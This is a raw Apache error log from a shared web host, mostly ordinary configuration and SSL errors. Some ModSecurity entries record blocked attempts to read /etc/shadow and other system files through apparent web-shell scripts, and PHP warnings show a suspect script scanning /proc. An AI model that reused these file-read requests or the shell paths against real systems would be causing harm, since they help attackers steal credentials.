[Mon May 11 21:17:43.947395 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:44.063726 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:44.180958 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:44.301783 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:44.419664 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:44.550245 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:44.572791 2026] [:error] [pid 1511173:tid 1511200] [client 114.119.143.207:22193] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=serverstatus&systpl=six&language=chinese
[Mon May 11 21:17:44.666925 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:44.784239 2026] [proxy_fcgi:error] [pid 1501883:tid 1501900] [client 74.249.238.26:43039] AH01071: Got error 'Primary script unknown'
[Mon May 11 21:17:50.890125 2026] [core:error] [pid 1501883:tid 1501897] [client 66.132.172.183:20456] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:17:50.890288 2026] [core:error] [pid 1501883:tid 1501897] [client 66.132.172.183:20456] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:17:56.276496 2026] [security2:error] [pid 1516058:tid 1516101] [client 216.73.216.110:11964] ModSecurity: Warning. Matched phrase "etc/shadow" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/shadow found within ARGS:filesrc: /etc/shadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIrZCMeXtzav-mi9Sy6tQAAAMs"]
[Mon May 11 21:17:56.374906 2026] [security2:error] [pid 1516058:tid 1516101] [client 216.73.216.110:11964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIrZCMeXtzav-mi9Sy6tQAAAMs"]
[Mon May 11 21:17:56.552669 2026] [security2:error] [pid 1516058:tid 1516101] [client 216.73.216.110:11964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIrZCMeXtzav-mi9Sy6tQAAAMs"]
[Mon May 11 21:18:18.487904 2026] [core:error] [pid 1511173:tid 1511185] [client 74.7.241.149:39482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:18:18.488013 2026] [core:error] [pid 1511173:tid 1511185] [client 74.7.241.149:39482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:18:53.469542 2026] [security2:error] [pid 1501883:tid 1501892] [client 43.153.67.21:55624] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/activites/activites-nautiques/"] [unique_id "agIrnTP5Q_-MBliRCAxxAgAAAAc"]
[Mon May 11 21:19:00.289902 2026] [security2:error] [pid 1502013:tid 1502044] [client 43.155.140.157:60338] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agIrpJYn-x0CHsbEbP20lgAAAJE"]
[Mon May 11 21:19:07.311227 2026] [:error] [pid 1502013:tid 1502039] [client 114.119.143.207:22195] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/login-form/
[Mon May 11 21:19:23.396351 2026] [security2:error] [pid 1501883:tid 1501899] [client 43.128.87.4:36824] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/contact"] [unique_id "agIruzP5Q_-MBliRCAxxFwAAAA4"]
[Mon May 11 21:19:28.700950 2026] [security2:error] [pid 1502013:tid 1502042] [client 43.128.87.4:47248] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/contact/"] [unique_id "agIrwJYn-x0CHsbEbP20sAAAAI8"], referer: https://www.jeanboyault.fr/contact
[Mon May 11 21:20:25.194803 2026] [core:error] [pid 1501883:tid 1501906] [client 35.195.61.202:40360] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:20:25.195023 2026] [core:error] [pid 1501883:tid 1501906] [client 35.195.61.202:40360] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:20:32.520221 2026] [security2:error] [pid 1502013:tid 1502041] [client 43.159.152.4:35050] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIsAJYn-x0CHsbEbP21FQAAAI4"]
[Mon May 11 21:20:48.576529 2026] [core:error] [pid 1501831:tid 1501853] [client 35.195.61.202:48808] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:20:48.576671 2026] [core:error] [pid 1501831:tid 1501853] [client 35.195.61.202:48808] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:20:48.583427 2026] [core:error] [pid 1516058:tid 1516100] [client 35.195.61.202:48820] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:20:48.583781 2026] [core:error] [pid 1516058:tid 1516100] [client 35.195.61.202:48820] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 21:20:58.272806 2026] [security2:error] [pid 1516058:tid 1516110] [client 129.226.94.18:49592] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-une-entreprise/"] [unique_id "agIsGiMeXtzav-mi9Sy7jgAAANQ"]
[Mon May 11 21:22:04.728848 2026] [authz_core:error] [pid 1502013:tid 1502040] [client 47.128.125.81:60650] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/src/error_log
[Mon May 11 21:22:20.240500 2026] [security2:error] [pid 1511173:tid 1511187] [client 43.156.125.227:51572] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.manhattan-studio.fr"] [uri "/scenographie.html"] [unique_id "agIsbPjVc-A-CSptvm183QAAAEs"]
[Mon May 11 21:22:55.106048 2026] [ssl:error] [pid 1501831:tid 1501852] [client 3.233.59.216:11994] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname dev2.rentparadise.fr provided via HTTP have no compatible SSL setup for policy 'secure'
[Mon May 11 21:23:24.230705 2026] [authz_core:error] [pid 1534836:tid 1534894] [client 47.128.28.125:28876] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/l10n/error_log
[Mon May 11 21:25:21.850643 2026] [ssl:error] [pid 1501883:tid 1501897] (EAI 2)Name or service not known: [client 116.202.235.23:58056] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:25:21.850933 2026] [ssl:error] [pid 1501883:tid 1501897] AH01941: stapling_renew_response: responder error
[Mon May 11 21:25:21.930428 2026] [ssl:error] [pid 1534836:tid 1534891] (EAI 2)Name or service not known: [client 116.202.235.23:58068] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:25:21.930465 2026] [ssl:error] [pid 1534836:tid 1534891] AH01941: stapling_renew_response: responder error
[Mon May 11 21:25:21.981655 2026] [ssl:error] [pid 1511173:tid 1511181] (EAI 2)Name or service not known: [client 116.202.235.23:58070] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:25:21.982274 2026] [ssl:error] [pid 1511173:tid 1511181] AH01941: stapling_renew_response: responder error
[Mon May 11 21:25:22.033716 2026] [ssl:error] [pid 1502013:tid 1502058] (EAI 2)Name or service not known: [client 116.202.235.23:58076] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:25:22.033763 2026] [ssl:error] [pid 1502013:tid 1502058] AH01941: stapling_renew_response: responder error
[Mon May 11 21:25:51.665169 2026] [security2:error] [pid 1501883:tid 1501896] [client 216.73.216.110:19184] ModSecurity: Warning. Matched phrase "var/log/messages" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/messages found within ARGS:filesrc: /var/log/messages-20260504"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agItPzP5Q_-MBliRCAxzMQAAAAs"]
[Mon May 11 21:25:51.666045 2026] [security2:error] [pid 1501883:tid 1501896] [client 216.73.216.110:19184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agItPzP5Q_-MBliRCAxzMQAAAAs"]
[Mon May 11 21:25:51.759306 2026] [security2:error] [pid 1501883:tid 1501896] [client 216.73.216.110:19184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agItPzP5Q_-MBliRCAxzMQAAAAs"]
[Mon May 11 21:26:04.830080 2026] [:error] [pid 1511173:tid 1511179] [client 167.71.199.143:49808] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 21:26:08.521581 2026] [security2:error] [pid 1516058:tid 1516096] [client 43.159.128.237:34202] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/diagnostic-pre-cession/"] [unique_id "agItUCMeXtzav-mi9Sy9UgAAAMY"]
[Mon May 11 21:26:19.999783 2026] [security2:error] [pid 1501831:tid 1501852] [client 216.73.216.110:39295] ModSecurity: Warning. Matched phrase ".bash_logout" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bash_logout found within ARGS:filesrc: /home/missmand/public_html/js/lightbox/.bash_logout.tar"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agItW1NddpkriGUb6ZWCjgAAARM"]
[Mon May 11 21:26:20.010517 2026] [security2:error] [pid 1501831:tid 1501852] [client 216.73.216.110:39295] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agItW1NddpkriGUb6ZWCjgAAARM"]
[Mon May 11 21:26:20.019503 2026] [security2:error] [pid 1511173:tid 1511181] [client 103.173.7.172:60953] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "368"] [id "920340"] [rev "3"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "127.0.0.1"] [uri "/GponForm/diag_Form"] [unique_id "agItW_jVc-A-CSptvm1-JAAAAEU"]
[Mon May 11 21:26:20.070444 2026] [security2:error] [pid 1501831:tid 1501852] [client 216.73.216.110:39295] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agItW1NddpkriGUb6ZWCjgAAARM"]
[Mon May 11 21:26:23.595511 2026] [security2:error] [pid 1501831:tid 1501856] [client 43.153.208.32:34436] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/embed/"] [unique_id "agItX1NddpkriGUb6ZWCkAAAARc"]
[Mon May 11 21:26:30.062577 2026] [security2:error] [pid 1516058:tid 1516104] [client 43.153.208.32:39522] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agItZiMeXtzav-mi9Sy9aQAAAM4"], referer: https://www.maelbailly.fr/embed/
[Mon May 11 21:26:43.456005 2026] [security2:error] [pid 1516058:tid 1516099] [client 43.162.103.213:44820] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agItcyMeXtzav-mi9Sy9dQAAAMk"]
[Mon May 11 21:27:39.495201 2026] [authz_core:error] [pid 1534836:tid 1534886] [client 216.73.216.110:19356] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/inc/entity/error_log
[Mon May 11 21:28:17.601326 2026] [authz_core:error] [pid 1501883:tid 1501889] [client 47.128.23.48:31578] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/rest-api/search/error_log
[Mon May 11 21:28:23.272479 2026] [core:crit] [pid 1502013:tid 1502030] (13)Permission denied: [client 47.128.58.46:44214] AH00529: /home/krakouka/public_html/wordpress/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home/krakouka/public_html/wordpress/' is executable
PHP Warning:  filesize(): stat failed for /proc/227/task/227/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/227/task/227/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/227/task/227/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/227/task/227/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/227/task/227/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/227/task/227/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/349/task/349/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/349/task/349/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/349/task/349/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/349/task/349/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/349/task/349/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/349/task/349/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/103/task/103/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/103/task/103/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/103/task/103/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/103/task/103/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/103/task/103/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/103/task/103/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/208/task/208/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/208/task/208/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/208/task/208/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/208/task/208/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/208/task/208/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/208/task/208/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/852/task/852/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/852/task/852/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/852/task/852/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/852/task/852/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/852/task/852/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/852/task/852/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/953/task/953/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/953/task/953/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/953/task/953/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/953/task/953/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/953/task/953/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/953/task/953/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:29:20.192559 2026] [ssl:error] [pid 1511173:tid 1511179] (EAI 2)Name or service not known: [client 114.119.142.72:48675] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:29:20.192621 2026] [ssl:error] [pid 1511173:tid 1511179] AH01941: stapling_renew_response: responder error
[Mon May 11 21:29:21.414222 2026] [ssl:error] [pid 1511173:tid 1511198] (EAI 2)Name or service not known: [client 45.156.128.68:41300] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:29:21.414585 2026] [ssl:error] [pid 1511173:tid 1511198] AH01941: stapling_renew_response: responder error
[Mon May 11 21:29:22.077803 2026] [ssl:error] [pid 1511173:tid 1511199] (EAI 2)Name or service not known: [client 114.119.142.72:48677] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:29:22.077843 2026] [ssl:error] [pid 1511173:tid 1511199] AH01941: stapling_renew_response: responder error
